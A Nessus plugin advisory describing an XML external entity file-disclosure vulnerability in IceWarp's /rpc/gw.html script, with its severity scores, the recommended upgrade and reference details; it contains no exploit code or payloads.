IceWarp /rpc/gw.html XML External Entity Arbitrary File Disclosure

medium Nessus Plugin ID 68983

Synopsis

The remote web server hosts a PHP script that is affected by an XML external entity injection vulnerability.

Description

The version of IceWarp installed on the remote host is affected by an XML external entity injection (XXE) vulnerability that can lead to the disclosure of arbitrary data. A remote, unauthenticated attacker may be able to view arbitrary files on the remote host by sending a specially crafted POST request to the '/rpc/gw.html' script.

Note that the application is reportedly also affected by an additional XML external entity vulnerability in the '/rpc/api.html' script. Additionally, the application is reportedly affected by multiple cross-site scripting vulnerabilities; however, Nessus has not tested for these additional issues.

Solution

Upgrade to version 10.4.5-1 or apply the workaround as referenced in the vendor's KB article.

See Also

http://www.nessus.org/u?e47e4d75

http://www.nessus.org/u?4c7d086b

Plugin Details

Severity: Medium

ID: 68983

File Name: icewarp_xml_external_entity_injection.nasl

Version: 1.7

Type: remote

Family: CGI abuses

Published: 7/19/2013

Updated: 1/19/2021

Supported Sensors: Nessus

Risk Information

CVSS Score Rationale: Information disclosure

CVSS v2

Risk Factor: Medium

Base Score: 5

Temporal Score: 4.1

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N

CVSS Score Source: manual

Vulnerability Information

CPE: cpe:/a:icewarp:webmail

Required KB Items: www/icewarp_webmail

Exploit Available: true

Exploit Ease: Exploits are available

Exploited by Nessus: true

Patch Publication Date: 6/11/2013

Vulnerability Publication Date: 6/25/2013

Reference Information

BID: 60755